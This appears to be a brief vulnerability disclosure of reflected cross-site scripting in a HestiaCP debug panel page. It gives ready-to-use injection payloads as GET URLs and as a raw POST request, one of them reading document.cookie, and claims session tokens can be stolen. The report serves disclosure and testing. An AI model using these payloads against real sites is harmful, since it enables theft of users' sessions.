An attacker can steal the session token of any user by exploiting reflected XSS.
Send GET request to any of the below links.
http://target/templates/pages/debug_panel.php?id=xss"><script>alert(document.cookie)</script>
http://target/templates/pages/debug_panel.php?id=xss"><script>alert('xss')</script>
Send POST request which looks like below
POST /templates/pages/debug_panel.php HTTP/1.1
Host: demo.hestiacp.com:8083
User-Agent: curl/7.79.1
Accept: */*
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
Connection: close
{"id":"<script>alert(1)</script>"}